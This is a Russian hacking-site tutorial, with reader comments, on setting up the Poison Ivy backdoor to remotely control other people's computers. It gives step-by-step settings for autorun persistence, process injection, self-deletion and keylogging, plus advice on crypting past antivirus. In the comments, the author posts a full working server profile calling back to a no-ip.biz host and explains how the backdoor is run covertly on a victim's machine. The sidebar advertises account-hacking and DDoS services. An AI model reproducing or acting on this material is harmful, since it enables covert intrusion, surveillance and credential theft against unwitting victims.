Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Настраиваем бэкдор Poison Ivy 2.3.2 Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Настраиваем бэкдор Poison Ivy 2.3.2

17.12.2009

Всем доброго времени суток!

Ко мне периодически обращаются с вопросом как юзать бэкдоры с бэкконектом.

Information must be free!

И по этому я решил написать эту статью, в которой опишу настройку бэкдора на примере ИХМО лучшего бэкдора с бэкконектом Poison Ivy 2.3.2

Вес его сервера всего 9 кб (!). Отлично криптуется и сжимается. Это вам не древний монстр Радмин, который плюется dll, криптуется по частям и потеряется на динамическом IP адресе жертвы (если не приклеить какую нибудь свистелку .LOL!)

Работает по принципу клиент-сервер.

Настройка не сложная, устроенна так что вы не сможете перейти к следующим настройкам не заполнив предыдущих.

Итак приступим. Для начала зайдем на оф.сайт программы http://www.poisonivy-rat.com и скачиваем там саму программу.

Запускаем и что мы видим? Это рабочее окно программы.

Сначала настроим клиент.

Выбираем вкладку   File -> New Client

Настраиваем порт, по умолчанию он стоит 3460. Также указываем

пароль на соединение.С настройкой клиента всё. Жмём Start.

Теперь рассмотрим настройку сервера.

Выбираем вкладку File -> New Server и видим такое окно


Выбираем Creat Profile и вводим название профиля.
после этого перед вами появиться окно настройки Connection - это настройка соединения сервера с клиентом.



Вводим пароль соединения который вы указали при настройке клиента и жмем Add. Перед вами появится окно DNS/Port


Вводим адрес к которому сервер будет конектится и порт указанный в настройках клиента.
Если Вы сделали всё правильно то при нажатии Test Connections появиться зелёная галочка.
С настройкой Соединения закончено.
Слева жмём вкладку Install- и видим:

Здесь настраиваем параметры установки сервера и прописываем авторан.

Filename - имя сервера
System Folder\ -куда скопируеться файл
Melt - удалить после запуска
Далее переходим к Advanced

Inject into a running process- внедрить в процесс
Process-
выбирай в какой процесс.По дефолту инжектится в процесс стандартного обозревателя.

Keylogger - ставить не советую т.к. палится, включите после установки.
Переходим на вкладку Build

Здесь всё просто. Иконку ставить смысла нет, так как всё равно криптовать.
Жмём с права внизу Generate- создаем сервер, вводим имя сервера и сохраняем.
При запуске сервера он сам зарегистрируется в клиенте.Вот и всё.



Вот скрин на котором я перевел на русский функции бэкдора


У кого динамический IP курите ману :

Настройка DDNS (dyndns.com / no-ip.com)

Тем кто не знает что такое бэкконект советую сначала узать это.Так как при халатном отношении к своей безопасности с этой программой вас могут легко найти

Всем всего доброго и удачных инжектов!

Статья написана специально для hackzone.ru . Не забывайте копирайты.

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Вирусы и спам
Опубликовал: Xlooder
Просмотров: 193805
Проголосовало через SMS: 0
Ключевые слова: poison ivy, backdoor, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Я очень доволен работой этого мастера. Всё то, что я заказывал ему, он сделал в срок. Так же он оказывает мне постоянную техподдержку. по настройкам и много даёт нужных консультаций по теме. Работа его неоднократно проверена мной. Рекомендую воспользоваться его знаниями. Грамотный МАСТЕР.
24.03.2010 / murzasha
при нажатии Test Connections не проходит тест (красн хрестик)брандмауер выкл.  может изза того што у меня  win 7 64x???
14.05.2010 / kaljantak
Это означает что нет конекта. Если у тебя денамический IP, юзайDDNS
Возможны неправильные настройки. Привожу рабочий конфиг. Сохранить в файл .pip и поместить в PI2.3.2\Profiles
Text

[Advanced]
PEbinary=1
PEc=0
PEd=0
PEp=0
PE=1
FileAlign=512
KeyLogger=1
InjectServer=1
Persistence=1
ProcessMutex=Heroman
CustomInject=1
CustomInjectProc=test.exe
[Connection]
Group=
HijackProxy=0
HijackProxyPersist=0
DNS=test.no-ip.biz:3460:0,
ID=test
Password=test
PasswordKey=0
Proxy=0
ProxyDNS=test.no-ip.biz:3460:0,
[Install]
Startup=1
StartupHKLM=1
StartupActiveX=1
ActiveXKey={C5CF7D4F-442A-756F-E2D5-356CC1807D7E}
HKLMName=Rean
Copy=1
Filename=test.exe
CopySystem=0
CopyWindows=1
ADS=1
Melt=0
[Build]
Icon=
bThirdParty=1
ThirdParty=upx.exe "%s"
 
14.05.2010 / Xlooder
Здарова! без базара реальная прога. Ток я знаю что этот вопрос не по теме но я уже 3 дня парюсь вообщем криптануть немогу анивиры палят...
08.06.2010 / Clous
Clous,Poison Ivy отлично криптуется.Паблик крипторы быстро палятся.Криптуй приватным или обратись в раздел "Ищу работу".
08.06.2010 / Xlooder
Вопрос такой.
У меня весь трафик проходит через маршрутизатор. Дабы коннекты с клиентом шли, я пробросил порт необходимый на рабочую лошадку. Но тем не менее коннекты не идут. Вопрос, почему?
13.06.2010 / onegreyonewhite
Значит чтото блочит 3460 порт. Проверь все возможные фаерволы. Используй функцию "Test conection" для проверки доступности порта. Также проверь настройки.Выше я приводил рабочий конфиг для создания сервера.
13.06.2010 / Xlooder
юзайте дедик с прямым ip и будет вам счастье. неразумно ставить админку бэкдора у себя на тачке
06.08.2010 / Xlooder
а как насчет установки клиента на компьютер-жертву? это можно сделать удаленно? у меня нет физического доступа к компу надо которым надо получить контроль. каким образом именно происходит установка клиентской части на комп-жертву?
29.11.2010 / Azemin
устанавливается скрытно. не висит в процессах. установка сводится к запуску сервера на интересующем компе.
29.11.2010 / Xlooder
то-бишь я склеиваю файл сервера с чем-то, посылаю это на удаленный компьютер под предлогом нужной и полезной проги, юзер это дело запускает и производит автоматом установку?
как я понял последний скрин (build) как-раз это и показывает? т.е. склеивание сервера с любым exe-шником. я правильно понял?
29.11.2010 / Azemin
так, вроде все настроил. по поводу опции build я конечно ошибся. но вообще можно ли сделать то, что я сверху описал? то есть присобачить исполняемый файл сервера к какому-нибудь с виду безобидному экзешнику?
29.11.2010 / Azemin
мужиГ задай свой вопрос на форуме. то что ты пишешь не как не относится к отзыву к публикации.
29.11.2010 / Xlooder
в таком случае, прошу прощения за оффтоп :)
29.11.2010 / Azemin
всё делаю по инструкции - скомпиленный файл сервера тупо не запускается =(
пишет ошибку запуска... вин 7 64бита имеет какое то в этом значение?
28.06.2012 / werside
аналогично, все делаю по инструкции, ничего сложного, но файлик сервера потом тупо не запускается, пишет что не может запустить, win 7 x32
15.04.2013 / roxvpn
Слушайте,а жертве нужно кидать сервер или как? Я просто новенький в этом.
18.06.2014 / vasyok561
Слушайте,а жертве нужно кидать сервер или как? Я просто новенький в этом.
22.06.2014 / vasyok561
Слушайте,а жертве нужно кидать сервер или как? Я просто новенький в этом.
23.06.2014 / vasyok561
гуглите patch для win7
08.02.2016 / Xlooder
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Разное / Продам, отдам » Продам свежие, июнь 2019, базы 2ГИС(2gis), яндекс.карты
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}